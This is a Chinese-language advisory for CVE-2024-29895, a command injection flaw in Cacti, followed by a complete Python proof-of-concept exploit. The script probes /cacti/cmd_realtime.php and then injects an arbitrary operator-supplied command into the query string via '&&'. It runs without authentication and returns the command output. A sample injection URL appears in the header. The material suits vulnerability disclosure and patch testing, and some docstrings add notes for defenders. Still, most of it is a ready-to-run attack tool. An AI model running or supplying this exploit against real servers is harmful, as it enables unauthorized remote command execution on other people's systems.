影响描述
CVE-2024-29895 是 Cacti 中的命令注入漏洞:当服务器的 PHP 启用了 register_argc_argv 选项时,未经身份验证的攻击者即可在服务器上执行任意命令,CVSS 评分为 10 分。下文脚本注释标明受影响的版本为 1.3.x DEV;该漏洞以 register_argc_argv 为 On 为前提,因此排查时应先确认该选项的状态。
poc&exp
# CVE-2024-29895 - RCE in Cacti
# A command injection vulnerability allows any unauthenticated user to execute arbitrary commands on the server when the register_argc_argv option of PHP is On.
# http://target/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1
# Cacti (PHP)
# Affected versions:
# 1.3.x DEV
# Usage: python3 cve-2024-29895.py http://target.com:8080/ "id"
# Developed by @stuub
import requests
import argparse
import urllib3
from urllib.parse import urlparse
# Silence urllib3's InsecureRequestWarning. The HTTP calls in this script are
# made with verify=False, so TLS certificates are not validated and the peer's
# identity is not checked; this line only hides the warning about that.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ANSI escape sequences used to colour the script's terminal output;
# `reset` restores the terminal's default attributes.
red, green, yellow, purple, reset = (
    "\033[91m",
    "\033[92m",
    "\033[93m",
    "\033[95m",
    "\033[0m",
)
def banner():
    """Print the script's ASCII-art title, CVE label and author credit.

    Purely cosmetic: the text is written to stdout and nothing is returned.
    The colour codes come from the module-level ANSI constants.
    """
    art = f"""
▄████▄ ▄▄▄ ▄████▄ ▄▄▄█████▓ ██▓ ██▀███ ▄████▄ ▓█████
▒██▀ ▀█ ▒████▄ ▒██▀ ▀█ ▓ ██▒ ▓▒▓██▒ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒▓█ ▄ ▒██ ▀█▄ ▒▓█ ▄ ▒ ▓██░ ▒░▒██▒ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░ ▓██▓ ░ ░██░ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▒ ▓███▀ ░ ▓█ ▓██▒▒ ▓███▀ ░ ▒██▒ ░ ░██░ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
░ ░▒ ▒ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░ ░▓ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
░ ▒ ▒ ▒▒ ░ ░ ▒ ░ ▒ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ░ ▒ ░ ░ ▒ ░ ░░ ░ ░ ░
░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░
{yellow}CVE-2024-29895 - RCE in Cacti 1.3.x DEV{reset}
{purple}Developed by @stuub{reset}
"""
    print(art)
def validate(url):
    """Report whether ``<url>/cacti/cmd_realtime.php`` answers with HTTP 200.

    The path is appended to ``url`` by plain concatenation and fetched with
    a single unauthenticated GET. A 200 status is the only thing checked;
    the response body is not inspected, so any page served at that path
    counts as a match.

    Args:
        url: Base URL exactly as given on the command line.

    Returns:
        True when the status code is 200, otherwise False. A status line is
        printed in either case.

    Note for defenders: this request reaches ``cmd_realtime.php`` through
    the web server, so it appears in the server's access log like any
    other GET to that path.
    """
    probe_url = url + "/cacti/cmd_realtime.php"
    # verify=False: the server's TLS certificate is not validated.
    reply = requests.get(probe_url, verify=False)
    found = reply.status_code == 200
    if found:
        print(f"{green}[*]{reset} Found Cacti installation")
    else:
        print(f"{red}[!]{reset} Cacti not found")
    return found
def RCE(url, command):
    """Send the CVE-2024-29895 request and print the server's reply.

    ``url`` is reduced to ``scheme://netloc`` (any path, query or fragment
    the caller supplied is dropped), then the fixed path
    ``/cacti/cmd_realtime.php`` and a query string containing ``command``
    are appended. The result is fetched with one GET and the body is
    printed with ``<br>`` tags turned into newlines.

    Args:
        url: Target base URL; only its scheme and host[:port] are used.
        command: Text placed into the query string as-is.

    Returns:
        None. Output goes to stdout.

    Note for defenders: per the header of this script the issue is only
    reachable when PHP's register_argc_argv option is On. The request is
    an ordinary GET, so a query string on ``cmd_realtime.php`` arriving
    from a web client is visible in the web server's access log.
    """
    parts = urlparse(url)
    base = f"{parts.scheme}://{parts.netloc}"
    payload = base + "/cacti/cmd_realtime.php?1+1&&" + command + "+1+1+1"
    print (f"{green}[*]{reset} Targeting URL: {yellow}{payload}{reset}")
    # verify=False: the server's TLS certificate is not validated.
    reply = requests.get(payload, verify=False)
    print(f"\n{green}[*]{reset} Response:")
    # The body is HTML; turn its line breaks into real newlines for the terminal.
    print(reply.text.replace("<br>", "\n"))
def main():
    """Parse ``-u/--url`` and ``-c/--command`` and run the two steps.

    Both options are declared optional to argparse, so their absence is
    checked by hand: if either is missing, a usage line is printed and the
    process exits. Otherwise validate() is called first and RCE() runs only
    when validate() returns True.

    NOTE(review): the printed usage line shows the URL as a positional
    argument, while the parser only accepts it through ``-u/--url``.
    """
    cli = argparse.ArgumentParser(description="CVE-2024-29895 - RCE in Cacti")
    cli.add_argument('-u', '--url', help="URL of the target")
    cli.add_argument('-c', '--command', help="Command to execute")
    opts = cli.parse_args()

    if None in (opts.url, opts.command):
        print(f"{green}Usage:{reset} python3 cve-2024-29895.py http://target.com:8080/ -c 'id'")
        exit()

    # Stop here unless the endpoint check succeeded.
    if not validate(opts.url):
        return
    RCE(opts.url, opts.command)
# Run only when executed as a script (not on import): show the banner,
# then hand over to main() for argument parsing and the requests.
if __name__ == "__main__":
    banner()
    main()